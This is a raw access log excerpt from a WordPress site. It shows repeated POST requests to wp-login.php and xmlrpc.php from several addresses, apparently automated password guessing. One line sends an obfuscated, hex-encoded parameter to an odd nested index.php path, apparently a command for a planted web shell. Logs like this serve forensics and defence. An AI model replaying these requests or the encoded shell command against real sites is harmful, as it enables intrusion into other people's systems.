89.117.74.114 - - [20/Oct/2025:10:16:41 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:42 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
103.171.92.209 - - [20/Oct/2025:10:16:42 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:16:44 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:16:44 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
162.240.159.156 - - [20/Oct/2025:10:16:44 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
162.240.159.156 - - [20/Oct/2025:10:16:45 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:10:14:19 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333235392p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393635392q3538623166393939383235663131353265646366336133346264343936306166222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
193.142.147.5 - - [20/Oct/2025:10:16:48 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:16:48 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
163.223.13.96 - - [20/Oct/2025:10:16:49 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
163.223.13.96 - - [20/Oct/2025:10:16:50 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
